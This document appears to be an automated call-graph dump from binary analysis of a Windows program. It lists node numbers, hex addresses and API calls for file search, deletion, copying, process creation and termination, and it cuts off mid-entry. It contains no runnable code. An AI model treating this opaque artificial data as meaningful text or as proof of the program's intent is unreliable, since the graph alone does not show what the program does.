f53dac Mailbox 98877->98883 98885 f53ebe Mailbox 98878->98885 98879 f53e88 FindNextFileW 98879->98883 98880 f01a36 59 API calls 98880->98883 98882 f01c9c 59 API calls 98882->98883 98883->98878 98883->98879 98883->98880 98883->98882 98884 f017e0 59 API calls 98883->98884 98887 f5412a 3 API calls 98883->98887 98888 f53eab FindClose 98883->98888 98889 f53e2a 98883->98889 98890 f53ef7 CopyFileExW 98883->98890 98894 f53e6b DeleteFileW 98883->98894 98945 f54561 98883->98945 98999 f01900 98883->98999 98884->98883 98885->98613 98887->98883 98888->98885 98892 f53e4e MoveFileW 98889->98892 98893 f53e3e DeleteFileW 98889->98893 99006 f0151f 98889->99006 98890->98883 98892->98883 98893->98883 98894->98883 98895->98783 98897 f01471 98896->98897 98898 f014ce 98896->98898 98897->98898 98900 f0147c 98897->98900 98899 f01981 59 API calls 98898->98899 98906 f0149f _memmove 98899->98906 98901 f01497 98900->98901 98902 f3f1de 98900->98902 98917 f01b7c 59 API calls Mailbox 98901->98917 98903 f01c7e 59 API calls 98902->98903 98905 f3f1e8 98903->98905 98907 f10fe6 Mailbox 59 API calls 98905->98907 98906->98810 98908 f3f208 98907->98908 98910 f01aa4 59 API calls 98909->98910 98911 f01614 98910->98911 98911->98806 98911->98823 98913 f019fb 98912->98913 98914 f019ee 98912->98914 98915 f10fe6 Mailbox 59 API calls 98913->98915 98914->98804 98915->98914 98916->98826 98917->98906 98919 f0134b 98918->98919 98920 f01981 59 API calls 98919->98920 98921 f0135b GetFileAttributesW 98920->98921 98921->98840 98921->98843 99009 f21b70 98922->99009 98925 f102b0 98927 f01821 59 API calls 98925->98927 98926 f102cd 98928 f019e1 59 API calls 98926->98928 98929 f102bc 98927->98929 98928->98929 98930 f0133d 59 API calls 98929->98930 98931 f102c8 98930->98931 98931->98860 98933 f01207 59 API calls 98932->98933 98934 f54f97 98933->98934 98935 f01207 59 API calls 98934->98935 98936 f54f9f 98935->98936 98937 f10119 59 API calls 98936->98937 98938 f54fae 98937->98938 98939 f10119 59 API calls 98938->98939 98940 f54fbe 98939->98940 98941 f0151f 61 API calls 98940->98941 98942 f54fce Mailbox 98941->98942 98942->98863 98944 f53d41 98943->98944 98944->98866 98944->98867 98946 f5457d 98945->98946 98947 f54590 98946->98947 98948 f54582 98946->98948 98950 f01207 59 API calls 98947->98950 98949 f01c9c 59 API calls 98948->98949 98998 f5458b Mailbox 98949->98998 98951 f54598 98950->98951 98952 f01207 59 API calls 98951->98952 98953 f545a0 98952->98953 98954 f01207 59 API calls 98953->98954 98955 f545ab 98954->98955 98956 f01207 59 API calls 98955->98956 98957 f545b3 98956->98957 98958 f01207 59 API calls 98957->98958 98959 f545bb 98958->98959 98960 f01207 59 API calls 98959->98960 98961 f545c3 98960->98961 98962 f01207 59 API calls 98961->98962 98963 f545cb 98962->98963 98964 f01207 59 API calls 98963->98964 98965 f545d3 98964->98965 98966 f10119 59 API calls 98965->98966 98967 f545ea 98966->98967 98968 f10119 59 API calls 98967->98968 98969 f54603 98968->98969 98970 f01609 59 API calls 98969->98970 98971 f5460f 98970->98971 98972 f54622 98971->98972 98973 f01981 59 API calls 98971->98973 98974 f01609 59 API calls 98972->98974 98973->98972 98975 f5462b 98974->98975 98976 f5463b 98975->98976 98977 f01981 59 API calls 98975->98977 98978 f01c9c 59 API calls 98976->98978 98977->98976 98979 f54647 98978->98979 98980 f017e0 59 API calls 98979->98980 98981 f54653 98980->98981 99011 f54713 59 API calls 98981->99011 98983 f54662 99012 f54713 59 API calls 98983->99012 98985 f54675 98986 f01609 59 API calls 98985->98986 98987 f5467f 98986->98987 98988 f54684 98987->98988 98989 f54696 98987->98989 98990 f01900 59 API calls 98988->98990 98991 f01609 59 API calls 98989->98991 98992 f54691 98990->98992 98993 f5469f 98991->98993 98996 f017e0 59 API calls 98992->98996 98994 f546bd 98993->98994 98995 f01900 59 API calls 98993->98995 98997 f017e0 59 API calls 98994->98997 98995->98992 98996->98994 98997->98998 98998->98883 99000 f01914 98999->99000 99001 f3f534 98999->99001 99013 f018a5 99000->99013 99002 f01c7e 59 API calls 99001->99002 99005 f3f53f __wsetenvp _memmove 99002->99005 99004 f0191f 99004->98883 99018 f014db 99006->99018 99010 f10291 GetFullPathNameW 99009->99010 99010->98925 99010->98926 99011->98983 99012->98985 99014 f018b4 __wsetenvp 99013->99014 99015 f01c7e 59 API calls 99014->99015 99016 f018c5 _memmove 99014->99016 99017 f3f4f1 _memmove 99015->99017 99016->99004 99019 f014e9 CompareStringW 99018->99019 99022 f3f210 99018->99022 99023 f0150c 99019->99023 99020 f3f25f 99022->99020 99024 f14eb8 60 API calls 99022->99024 99023->98889 99024->99022 99026 f5f8f2 99025->99026 99027 f5f898 99025->99027 99101 f5fbb7 59 API calls 99026->99101 99028 f10fe6 Mailbox 59 API calls 99027->99028 99030 f5f89f 99028->99030 99031 f5f8ab 99030->99031 99088 f03df7 60 API calls Mailbox 99030->99088 99033 ef4d37 84 API calls 99031->99033 99036 f5f8bd 99033->99036 99034 f5f8ff 99035 f5f9cb 99034->99035 99037 f5f8d9 99034->99037 99042 f5f93f 99034->99042 99081 f58cd0 99035->99081 99089 f03e47 99036->99089 99037->98616 99040 f5f9d2 99085 f5394d 99040->99085 99044 ef4d37 84 API calls 99042->99044 99043 f5f8cd 99043->99037 99100 f03f0b CloseHandle 99043->99100 99052 f5f946 99044->99052 99047 f5f9c1 99062 f5399c 99047->99062 99048 f5f97a 99050 f0162d 59 API calls 99048->99050 99051 f5f98a 99050->99051 99054 f01c9c 59 API calls 99051->99054 99052->99047 99052->99048 99053 f042cf CloseHandle 99055 f5fa20 99053->99055 99056 f5f994 99054->99056 99055->99037 99102 f03f0b CloseHandle 99055->99102 99057 f01900 59 API calls 99056->99057 99059 f5f9a2 99057->99059 99060 f5399c 66 API calls 99059->99060 99061 f5f9ae Mailbox 99060->99061 99061->99037 99061->99053 99063 f53a15 99062->99063 99064 f539af 99062->99064 99065 f5394d 3 API calls 99063->99065 99064->99063 99066 f539b4 99064->99066 99068 f539fd Mailbox 99065->99068 99067 f53a09 99066->99067 99069 f539be 99066->99069 99120 f53a35 62 API calls Mailbox 99067->99120 99068->99061 99071 f539de 99069->99071 99072 f539c8 99069->99072 99073 f040cd 59 API calls 99071->99073 99106 f040cd 99072->99106 99075 f539e6 99073->99075 99119 f538e0 61 API calls Mailbox 99075->99119 99079 f539dc 99103 f5397e 99079->99103 99082 f58cde 99081->99082 99083 f58cd9 99081->99083 99082->99040 99123 f57d6e 61 API calls 2 library calls 99083->99123 99124 f5384c 99085->99124 99087 f53959 WriteFile 99087->99061 99088->99031 99090 f042cf CloseHandle 99089->99090 99091 f03e53 99090->99091 99133 f042f9 99091->99133 99093 f03e95 99093->99034 99093->99043 99094 f03e72 99094->99093 99141 f03c61 62 API calls Mailbox 99094->99141 99096 f03e84 99142 f0389f 99096->99142 99099 f5394d 3 API calls 99099->99093 99100->99037 99101->99034 99102->99037 99104 f5394d 3 API calls 99103->99104 99105 f53990 99104->99105 99105->99068 99107 f10fe6 Mailbox 59 API calls 99106->99107 99108 f040e0 99107->99108 99109 f01c7e 59 API calls 99108->99109 99110 f040ed 99109->99110 99111 f0402a WideCharToMultiByte 99110->99111 99112 f04085 99111->99112 99113 f0404e 99111->99113 99122 f03f20 59 API calls Mailbox 99112->99122 99115 f10fe6 Mailbox 59 API calls 99113->99115 99116 f04055 WideCharToMultiByte 99115->99116 99121 f03f79 59 API calls 2 library calls 99116->99121 99118 f04077 99118->99079 99119->99079 99120->99068 99121->99118 99122->99118 99123->99082 99125 f53853 99124->99125 99126 f5385e 99124->99126 99131 f042ae SetFilePointerEx 99125->99131 99126->99087 99128 f538b8 SetFilePointerEx 99132 f042ae SetFilePointerEx 99128->99132 99130 f538d7 99130->99087 99131->99128 99132->99130 99134 f04312 CreateFileW 99133->99134 99135 f406fc 99133->99135 99136 f04334 99134->99136 99135->99136 99137 f40702 CreateFileW 99135->99137 99136->99094 99137->99136 99138 f40728 99137->99138 99146 f0410a 99138->99146 99141->99096 99143 f038b5 99142->99143 99144 f038a8 99142->99144 99143->99093 99143->99099 99145 f0410a 2 API calls 99144->99145 99145->99143 99153 f04124 99146->99153 99147 f406cc 99155 f042ae SetFilePointerEx 99147->99155 99148 f041ab SetFilePointerEx 99154 f042ae SetFilePointerEx 99148->99154 99151 f0417f 99151->99136 99152 f406e6 99153->99147 99153->99148 99153->99151 99154->99151 99155->99152 99157 f54965 FindFirstFileW 99156->99157 99158 f54131 99156->99158 99157->99158 99159 f5497a FindClose 99157->99159 99158->98496 99159->99158 99161 ef4d37 84 API calls 99160->99161 99162 f6d203 99161->99162 99181 f6d24a Mailbox 99162->99181 99198 f6de8e 99162->99198 99164 f6d4a2 99165 f6d617 99164->99165 99169 f6d4b0 99164->99169 99249 f6dfb1 92 API calls Mailbox 99165->99249 99168 f6d626 99168->99169 99171 f6d632 99168->99171 99211 f6d057 99169->99211 99170 ef4d37 84 API calls 99189 f6d29b Mailbox 99170->99189 99171->99181 99176 f6d4e9 99226 f10e38 99176->99226 99179 f6d503 99233 f5a48d 89 API calls 4 library calls 99179->99233 99180 f6d51c 99234 ef47be 99180->99234 99181->98622 99184 f6d50e GetCurrentProcess TerminateProcess 99184->99180 99189->99164 99189->99170 99189->99181 99231 f5fc0d 59 API calls 2 library calls 99189->99231 99232 f6d6c8 61 API calls 2 library calls 99189->99232 99190 f6d68d 99190->99181 99194 f6d6a1 FreeLibrary 99190->99194 99191 f6d554 99246 f6dd32 107 API calls _free 99191->99246 99194->99181 99195 f6d565 99195->99190 99247 ef4230 59 API calls Mailbox 99195->99247 99248 ef523c 59 API calls 99195->99248 99250 f6dd32 107 API calls _free 99195->99250 99199 f01aa4 59 API calls 99198->99199 99200 f6dea9 CharLowerBuffW 99199->99200 99251 f4f903 99200->99251 99204 f01207 59 API calls 99205 f6dee2 99204->99205 99206 f01462 59 API calls 99205->99206 99208 f6def9 99206->99208 99207 f6df41 Mailbox 99207->99189 99209 f01981 59 API calls 99208->99209 99210 f6df05 Mailbox 99209->99210 99210->99207 99258 f6d6c8 61 API calls 2 library calls 99210->99258 99212 f6d072 99211->99212 99216 f6d0c7 99211->99216 99213 f10fe6 Mailbox 59 API calls 99212->99213 99215 f6d094 99213->99215 99214 f10fe6 Mailbox 59 API calls 99214->99215 99215->99214 99215->99216 99217 f6e139 99216->99217 99218 f6e362 Mailbox 99217->99218 99222 f6e15c _strcat _wcscpy __wsetenvp 99217->99222 99218->99176 99219 ef50d5 59 API calls 99219->99222 99220 ef502b 59 API calls 99220->99222 99221 ef5087 59 API calls 99221->99222 99222->99218 99222->99219 99222->99220 99222->99221 99223 f1593c 58 API calls _W_store_winword 99222->99223 99224 ef4d37 84 API calls 99222->99224 99259 f55e42 61 API calls 2 library calls 99222->99259 99223->99222 99224->99222 99227 f10e4d 99226->99227 99228 f10ee5 CreateProcessW 99227->99228 99229 f10ed3 CloseHandle 99227->99229 99230 f10eb3 99227->99230 99228->99230 99229->99230 99230->99179 99230->99180 99231->99189 99232->99189 99233->99184 99235 ef47c6 99234->99235 99236 f10fe6 Mailbox 59 API calls 99235->99236 99237 ef47d4 99236->99237 99238 ef47e0 99237->99238 99260 ef46ec 59 API calls Mailbox 99237->99260 99240 ef4540 99238->99240 99261 ef4650 99240->99261 99242 ef454f 99243 f10fe6 Mailbox 59 API calls 99242->99243 99244 ef45eb 99242->99244 99243->99244 99244->99195 99245 ef4230 59 API calls Mailbox 99244->99245 99245->99191 99246->99195 99247->99195 99248->99195 99249->99168 99250->99195 99252 f4f92e __wsetenvp 99251->99252 99253 f4f96d 99252->99253 99256 f4f963 99252->99256 99257 f4fa14 99252->99257 99253->99204 99253->99210 99254 f014db 61 API calls 99254->99256 99255 f014db 61 API calls 99255->99257 99256->99253 99256->99254 99257->99253 99257->99255 99258->99207 99259->99222 99260->99238 99262 ef4659 Mailbox 99261->99262 99263 f2d6ec 99262->99263 99268 ef4663 99262->99268 99264 f10fe6 Mailbox 59 API calls 99263->99264 99266 f2d6f8 99264->99266 99265 ef466a 99265->99242 99266->99266 99268->99265 99269 ef5190 59 API calls Mailbox 99268->99269 99269->99268 99271 f01207 59 API calls 99270->99271 99272 f54024 99271->99272 99273 f01207 59 API calls 99272->99273 99274 f5402d 99273->99274 99275 f01207 59 API calls 99274->99275 99276 f54036 99275->99276 99277 f10284 60 API calls 99276->99277 99278 f54041 99277->99278 99279 f54fec GetFileAttributesW 99278->99279 99280 f5404a 99279->99280 99281 f5405c 99280->99281 99282 f01900 59 API calls 99280->99282 99283 f10119 59 API calls 99281->99283 99282->99281 99284 f54070 FindFirstFileW 99283->99284 99285 f540fc FindClose 99284->99285 99288 f5408f 99284->99288 99290 f54107 Mailbox 99285->99290 99286 f540d7 FindNextFileW 99286->99288 99287 f01c9c 59 API calls 99287->99288 99288->99285 99288->99286 99288->99287 99289 f017e0 59 API calls 99288->99289 99291 f01900 59 API calls 99288->99291 99289->99288 99290->98627 99292 f540c8 DeleteFileW 99291->99292 99292->99286 99293 f540f3 FindClose 99292->99293 99293->99290 99294->98647 99295->98645 99297 f6a970 99296->99297 99298 f6a918 99296->99298 99297->98674 99299 f10fe6 Mailbox 59 API calls 99298->99299 99302 f6a93a 99299->99302 99300 f10fe6 Mailbox 59 API calls 99300->99302 99302->99297 99302->99300 99328 f4715b 59 API calls Mailbox 99302->99328 99304 f578e3 99303->99304 99305 f578ac 99303->99305 99307 f46ebc 99304->99307 99305->99304 99306 f10fe6 Mailbox 59 API calls 99305->99306 99306->99304 99308 f46f06 99307->99308 99309 f46f1c Mailbox 99307->99309 99310 f01a36 59 API calls 99308->99310 99311 f46f47 99309->99311 99313 f46f5a 99309->99313 99310->99309 99312 f6c355 299 API calls 99311->99312 99319 f46f53 99312->99319 99314 efa820 299 API calls 99313->99314 99317 f46f91 99314->99317 99316 f47002 99316->98676 99318 f46fdc 99317->99318 99317->99319 99321 f46fc1 99317->99321 99318->99319 99334 f5a48d 89 API calls 4 library calls 99318->99334 99335 f46cf1 59 API calls Mailbox 99319->99335 99329 f4706d 99321->99329 99323->98676 99324->98685 99325->98690 99326->98702 99327->98706 99328->99302 99330 f47085 99329->99330 99336 f6495b 99330->99336 99345 f6f1b2 99330->99345 99331 f470d9 99331->99319 99334->99319 99335->99316 99337 f10fe6 Mailbox 59 API calls 99336->99337 99338 f6496c 99337->99338 99350 f0433f 99338->99350 99341 ef4d37 84 API calls 99342 f6498d GetEnvironmentVariableW 99341->99342 99353 f57a51 59 API calls Mailbox 99342->99353 99344 f649aa 99344->99331 99346 ef4d37 84 API calls 99345->99346 99347 f6f1cf 99346->99347 99348 f54148 66 API calls 99347->99348 99349 f6f1de 99348->99349 99349->99331 99351 f10fe6 Mailbox 59 API calls 99350->99351 99352 f04351 99351->99352 99352->99341 99353->99344 99355 f54d09 99354->99355 99359 f54cf0 99354->99359 99361 f137c3 59 API calls __wcstoi64 99355->99361 99358 f54d0f 99358->98719 99359->99355 99359->99358 99360 f1385c GetStringTypeW _iswctype 99359->99360 99360->99359 99361->99358 99362 f17e83 99363 f17e8f __wsopen_helper 99362->99363 99399 f1a038 GetStartupInfoW 99363->99399 99365 f17e94 99401 f18dac GetProcessHeap 99365->99401 99367 f17eec 99368 f17ef7 99367->99368 99484 f17fd3 58 API calls 3 library calls 99367->99484 99402 f19d16 99368->99402 99371 f17efd 99372 f17f08 __RTC_Initialize 99371->99372 99485 f17fd3 58 API calls 3 library calls 99371->99485 99423 f1d802 99372->99423 99375 f17f17 99376 f17f23 GetCommandLineW 99375->99376 99486 f17fd3 58 API calls 3 library calls 99375->99486 99442 f25153 GetEnvironmentStringsW 99376->99442 99379 f17f22 99379->99376 99382 f17f3d 99383 f17f48 99382->99383 99487 f132e5 58 API calls 3 library calls 99382->99487 99452 f24f88 99383->99452 99386 f17f4e 99387 f17f59 99386->99387 99488 f132e5 58 API calls 3 library calls 99386->99488 99466 f1331f 99387->99466 99390 f17f61 99392 f17f6c __wwincmdln 99390->99392 99489 f132e5 58 API calls 3 library calls 99390->99489 99472 f05f8b 99392->99472 99394 f17f80 99395 f17f8f 99394->99395 99490 f13588 58 API calls _doexit 99394->99490 99491 f13310 58 API calls _doexit 99395->99491 99398 f17f94 __wsopen_helper 99400 f1a04e 99399->99400 99400->99365 99401->99367 99492 f133b7 36 API calls 2 library calls 99402->99492 99404 f19d1b 99493 f19f6c InitializeCriticalSectionAndSpinCount __mtinitlocks 99404->99493 99406 f19d20 99407 f19d24 99406->99407 99495 f19fba TlsAlloc 99406->99495 99494 f19d8c 61 API calls 2 library calls 99407->99494 99410 f19d29 99410->99371 99411 f19d36 99411->99407 99412 f19d41 99411->99412 99496 f18a05 99412->99496 99415 f19d83 99504 f19d8c 61 API calls 2 library calls 99415->99504 99418 f19d88 99418->99371 99419 f19d62 99419->99415 99420 f19d68 99419->99420 99503 f19c63 58 API calls 4 library calls 99420->99503 99422 f19d70 GetCurrentThreadId 99422->99371 99424 f1d80e __wsopen_helper 99423->99424 99425 f19e3b __lock 58 API calls 99424->99425 99426 f1d815 99425->99426 99427 f18a05 __calloc_crt 58 API calls 99426->99427 99429 f1d826 99427->99429 99428 f1d891 GetStartupInfoW 99436 f1d9d5 99428->99436 99438 f1d8a6 99428->99438 99429->99428 99430 f1d831 __wsopen_helper @_EH4_CallFilterFunc@8 99429->99430 99430->99375 99431 f1da9d 99518 f1daad LeaveCriticalSection _doexit 99431->99518 99433 f1d8f4 99433->99436 99439 f1d928 GetFileType 99433->99439 99516 f1a05b InitializeCriticalSectionAndSpinCount 99433->99516 99434 f18a05 __calloc_crt 58 API calls 99434->99438 99435 f1da22 GetStdHandle 99435->99436 99436->99431 99436->99435 99437 f1da35 GetFileType 99436->99437 99517 f1a05b InitializeCriticalSectionAndSpinCount 99436->99517 99437->99436 99438->99433 99438->99434 99438->99436 99439->99433 99443 f25164 99442->99443 99444 f17f33 99442->99444 99519 f18a4d 58 API calls 2 library calls 99443->99519 99448 f24d4b GetModuleFileNameW 99444->99448 99446 f251a0 FreeEnvironmentStringsW 99446->99444 99447 f2518a _memmove 99447->99446 99449 f24d7f _wparse_cmdline 99448->99449 99451 f24dbf _wparse_cmdline 99449->99451 99520 f18a4d 58 API calls 2 library calls 99449->99520 99451->99382 99453 f24fa1 __wsetenvp 99452->99453 99457 f24f99 99452->99457 99454 f18a05 __calloc_crt 58 API calls 99453->99454 99462 f24fca __wsetenvp 99454->99462 99455 f25021 99456 f12f85 _free 58 API calls 99455->99456 99456->99457 99457->99386 99458 f18a05 __calloc_crt 58 API calls 99458->99462 99459 f25046 99461 f12f85 _free 58 API calls 99459->99461 99461->99457 99462->99455 99462->99457 99462->99458 99462->99459 99463 f2505d 99462->99463 99521 f24837 58 API calls 2 library calls 99462->99521 99522 f18ff6 IsProcessorFeaturePresent 99463->99522 99465 f25069 99465->99386 99467 f1332b __IsNonwritableInCurrentImage 99466->99467 99545 f1a701 99467->99545 99469 f13349 __initterm_e 99470 f12f70 __cinit 67 API calls 99469->99470 99471 f13368 __cinit __IsNonwritableInCurrentImage 99469->99471 99470->99471 99471->99390 99473 f05fa5 99472->99473 99483 f06044 99472->99483 99474 f05fdf IsThemeActive 99473->99474 99548 f1359c 99474->99548 99478 f0600b 99560 f05f00 SystemParametersInfoW SystemParametersInfoW 99478->99560 99480 f06017 99561 f05240 99480->99561 99482 f0601f SystemParametersInfoW 99482->99483 99483->99394 99484->99368 99485->99372 99486->99379 99490->99395 99491->99398 99492->99404 99493->99406 99494->99410 99495->99411 99498 f18a0c 99496->99498 99499 f18a47 99498->99499 99501 f18a2a 99498->99501 99505 f25426 99498->99505 99499->99415 99502 f1a016 TlsSetValue 99499->99502 99501->99498 99501->99499 99513 f1a362 Sleep 99501->99513 99502->99419 99503->99422 99504->99418 99506 f25431 99505->99506 99511 f2544c 99505->99511 99507 f2543d 99506->99507 99506->99511 99514 f18d58 58 API calls __getptd_noexit 99507->99514 99509 f2545c HeapAlloc 99510 f25442 99509->99510 99509->99511 99510->99498 99511->99509 99511->99510 99515 f135d1 DecodePointer 99511->99515 99513->99501 99514->99510 99515->99511 99516->99433 99517->99436 99518->99430 99519->99447 99520->99451 99521->99462 99523 f19001 99522->99523 99528 f18e89 99523->99528 99527 f1901c 99527->99465 99529 f18ea3 _memset ___raise_securityfailure 99528->99529 99530 f18ec3 IsDebuggerPresent 99529->99530 99536 f1a385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99530->99536 99533 f18f87 ___raise_securityfailure 99537 f1c826 99533->99537 99534 f18faa 99535 f1a370 GetCurrentProcess TerminateProcess 99534->99535 99535->99527 99536->99533 99538 f1c830 IsProcessorFeaturePresent 99537->99538 99539 f1c82e 99537->99539 99541 f25b3a 99538->99541 99539->99534 99544 f25ae9 5 API calls ___raise_securityfailure 99541->99544 99543 f25c1d 99543->99534 99544->99543 99546 f1a704 EncodePointer 99545->99546 99546->99546 99547 f1a71e 99546->99547 99547->99469 99549 f19e3b __lock 58 API calls 99548->99549 99550 f135a7 DecodePointer EncodePointer 99549->99550 99613 f19fa5 LeaveCriticalSection 99550->99613 99552 f06004 99553 f13604 99552->99553 99554 f13628 99553->99554 99555 f1360e 99553->99555 99554->99478 99555->99554 99614 f18d58 58 API calls __getptd_noexit 99555->99614 99557 f13618 99615 f18fe6 9 API calls __wsopen_helper 99557->99615 99559 f13623 99559->99478 99560->99480 99562 f0524d __ftell_nolock 99561->99562 99563 f01207 59 API calls 99562->99563 99564 f05258 GetCurrentDirectoryW 99563->99564 99616 f04ec8 99564->99616 99566 f0527e IsDebuggerPresent 99567 f40b21 MessageBoxA 99566->99567 99568 f0528c 99566->99568 99570 f40b39 99567->99570 99569 f052a0 99568->99569 99568->99570 99684 f031bf 99569->99684 99739 f0314d 59 API calls Mailbox 99570->99739 99573 f40b49 99580 f40b5f SetCurrentDirectoryW 99573->99580 99579 f0536c Mailbox 99579->99482 99580->99579 99613->99552 99614->99557 99615->99559 99617 f01207 59 API calls 99616->99617 99618 f04ede 99617->99618 99748 f05420 99618->99748 99620 f04efc 99621 f019e1 59 API calls 99620->99621 99622 f04f10 99621->99622 99623 f01c9c 59 API calls 99622->99623 99624 f04f1b 99623->99624 99762 ef477a 99624->99762 99627 f01a36 59 API calls 99628 f04f34 99627->99628 99629 ef39be 68 API calls 99628->99629 99630 f04f44 Mailbox 99629->99630 99631 f01a36 59 API calls 99630->99631 99632 f04f68 99631->99632 99633 ef39be 68 API calls 99632->99633 99634 f04f77 Mailbox 99633->99634 99635 f01207 59 API calls 99634->99635 99636 f04f94 99635->99636 99765 f055bc 99636->99765 99640 f04fae 99641 f40a54 99640->99641 99642 f04fb8 99640->99642 99643 f055bc 59 API calls 99641->99643 99644 f1312d _W_store_winword 60 API calls 99642->99644 99645 f40a68 99643->99645 99646 f04fc3 99644->99646 99649 f055bc 59 API calls 99645->99649 99646->99645 99647 f04fcd 99646->99647 99648 f1312d _W_store_winword 60 API calls 99647->99648 99650 f04fd8 99648->99650 99651 f40a84 99649->99651 99650->99651 99652 f04fe2 99650->99652 99653 f100cf 61 API calls 99651->99653 99654 f1312d _W_store_winword 60 API calls 99652->99654 99655 f40aa7 99653->99655 99656 f04fed 99654->99656 99657 f055bc 59 API calls 99655->99657 99658 f04ff7 99656->99658 99659 f40ad0 99656->99659 99660 f40ab3 99657->99660 99661 f0501b 99658->99661 99664 f01c9c 59 API calls 99658->99664 99662 f055bc 59 API calls 99659->99662 99663 f01c9c 59 API calls 99660->99663 99668 ef47be 59 API calls 99661->99668 99665 f40aee 99662->99665 99666 f40ac1 99663->99666 99667 f0500e 99664->99667 99669 f01c9c 59 API calls 99665->99669 99670 f055bc 59 API calls 99666->99670 99671 f055bc 59 API calls 99667->99671 99672 f0502a 99668->99672 99673 f40afc 99669->99673 99670->99659 99671->99661 99675 ef4540 59 API calls 99672->99675 99674 f055bc 59 API calls 99673->99674 99676 f40b0b 99674->99676 99677 f05038 99675->99677 99676->99676 99781 ef43d0 99677->99781 99679 ef477a 59 API calls 99681 f05055 99679->99681 99680 ef43d0 59 API calls 99680->99681 99681->99679 99681->99680 99682 f055bc 59 API calls 99681->99682 99683 f0509b Mailbox 99681->99683 99682->99681 99683->99566 99685 f031cc __ftell_nolock 99684->99685 99686 f40314 _memset 99685->99686 99687 f031e5 99685->99687 99689 f40330 GetOpenFileNameW 99686->99689 99688 f10284 60 API calls 99687->99688 99690 f031ee 99688->99690 99692 f4037f 99689->99692 99801 f109c5 99690->99801 99694 f01821 59 API calls 99692->99694 99696 f40394 99694->99696 99696->99696 99697 f03203 99819 f0278a 99697->99819 99739->99573 99749 f0542d __ftell_nolock 99748->99749 99750 f01821 59 API calls 99749->99750 99752 f05590 Mailbox 99749->99752 99753 f0545f 99750->99753 99751 f01609 59 API calls 99751->99753 99752->99620 99753->99751 99761 f05495 Mailbox 99753->99761 99754 f01609 59 API calls 99754->99761 99755 f05563 99755->99752 99756 f01a36 59 API calls 99755->99756 99757 f05584 99756->99757 99759 f04c94 59 API calls 99757->99759 99758 f01a36 59 API calls 99758->99761 99759->99752 99761->99752 99761->99754 99761->99755 99761->99758 99790 f04c94 99761->99790 99763 f10fe6 Mailbox 59 API calls 99762->99763 99764 ef4787 99763->99764 99764->99627 99766 f055c6 99765->99766 99767 f055df 99765->99767 99768 f01c9c 59 API calls 99766->99768 99769 f01821 59 API calls 99767->99769 99770 f04fa0 99768->99770 99769->99770 99771 f1312d 99770->99771 99772 f131ae 99771->99772 99774 f13139 99771->99774 99798 f131c0 60 API calls 4 library calls 99772->99798 99780 f1315e 99774->99780 99796 f18d58 58 API calls __getptd_noexit 99774->99796 99776 f131bb 99776->99640 99777 f13145 99797 f18fe6 9 API calls __wsopen_helper 99777->99797 99779 f13150 99779->99640 99780->99640 99782 f2d6c9 99781->99782 99784 ef43e7 99781->99784 99782->99784 99800 ef40cb 59 API calls Mailbox 99782->99800 99785 ef44e8 99784->99785 99786 ef4530 99784->99786 99789 ef44ef 99784->99789 99788 f10fe6 Mailbox 59 API calls 99785->99788 99799 ef523c 59 API calls 99786->99799 99788->99789 99789->99681 99791 f04ca2 99790->99791 99795 f04cc4 _memmove 99790->99795 99794 f10fe6 Mailbox 59 API calls 99791->99794 99792 f10fe6 Mailbox 59 API calls 99793 f04cd8 99792->99793 99793->99761 99794->99795 99795->99792 99796->99777 99797->99779 99798->99776 99799->99789 99800->99784 99802 f21b70 __ftell_nolock 99801->99802 99803 f109d2 GetLongPathNameW 99802->99803 99804 f01821 59 API calls 99803->99804 99805 f031f7 99804->99805 99806 f02f3d 99805->99806 99807 f01207 59 API calls 99806->99807 99808 f02f4f 99807->99808 99809 f10284 60 API calls 99808->99809 99810 f02f5a 99809->99810 99811 f02f65 99810->99811 99816 f40177 99810->99816 99813 f04c94 59 API calls 99811->99813 99812 f0151f 61 API calls 99812->99816 99814 f02f71 99813->99814 99853 ef1307 99814->99853 99815 f40191 99816->99812 99816->99815 99818 f02f84 Mailbox 99818->99697 99859 f049c2 99819->99859 99822 f3f8d6 99976 f59b16 99822->99976 99823 f049c2 136 API calls 99825 f027c3 99823->99825 99825->99822 99827 f027cb 99825->99827 99831 f3f8f3 99827->99831 99832 f027d7 99827->99832 99855 ef1319 99853->99855 99858 ef1338 _memmove 99853->99858 99854 f10fe6 Mailbox 59 API calls 99856 ef134f 99854->99856 99857 f10fe6 Mailbox 59 API calls 99855->99857 99856->99818 99857->99858 99858->99854 100043 f04b29 99859->100043 99864 f049ed LoadLibraryExW 100053 f04ade 99864->100053 99865 f408bb 99866 f04a2f 84 API calls 99865->99866 99868 f408c2 99866->99868 99871 f04ade 3 API calls 99868->99871 99873 f408ca 99871->99873 99872 f04a14 99872->99873 99874 f04a20 99872->99874 100079 f04ab2 99873->100079 99875 f04a2f 84 API calls 99874->99875 99877 f027af 99875->99877 99877->99822 99877->99823 99880 f408f1 100087 f04a6e 99880->100087 99977 f04a8c 85 API calls 99976->99977 99978 f59b85 99977->99978 100092 f04b77 100043->100092 100046 f04b50 100048 f04b60 FreeLibrary 100046->100048 100049 f049d4 100046->100049 100047 f04b77 2 API calls 100047->100046 100048->100049 100050 f1547b 100049->100050 100096 f15490 100050->100096 100052 f049e1 100052->99864 100052->99865 100177 f04baa 100053->100177 100056 f04baa 2 API calls 100059 f04b03 100056->100059 100057 f04b15 FreeLibrary 100058 f04a05 100057->100058 100060 f048b0 100058->100060 100059->100057 100059->100058 100061 f10fe6 Mailbox 59 API calls 100060->100061 100062 f048c5 100061->100062 100063 f0433f 59 API calls 100062->100063 100064 f048d1 _memmove 100063->100064 100065 f0490c 100064->100065 100066 f4080a 100064->100066 100068 f04a6e 69 API calls 100065->100068 100067 f40817 100066->100067 100186 f59ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 100066->100186 100187 f59f5e 95 API calls 100067->100187 100078 f04915 100068->100078 100071 f04ab2 74 API calls 100071->100078 100072 f40859 100181 f04a8c 100072->100181 100075 f049a0 100075->99872 100076 f04a8c 85 API calls 100076->100078 100078->100071 100078->100072 100078->100075 100078->100076 100080 f40945 100079->100080 100081 f04ac4 100079->100081 100293 f15802 100081->100293 100084 f596c4 100418 f5951a 100084->100418 100086 f596da 100086->99880 100088 f40908 100087->100088 100089 f04a7d 100087->100089 100423 f15e80 100089->100423 100093 f04b44 100092->100093 100094 f04b80 LoadLibraryA 100092->100094 100093->100046 100093->100047 100094->100093 100095 f04b91 GetProcAddress 100094->100095 100095->100093 100097 f1549c __wsopen_helper 100096->100097 100098 f154af 100097->100098 100101 f154e0 100097->100101 100145 f18d58 58 API calls __getptd_noexit 100098->100145 100100 f154b4 100146 f18fe6 9 API calls 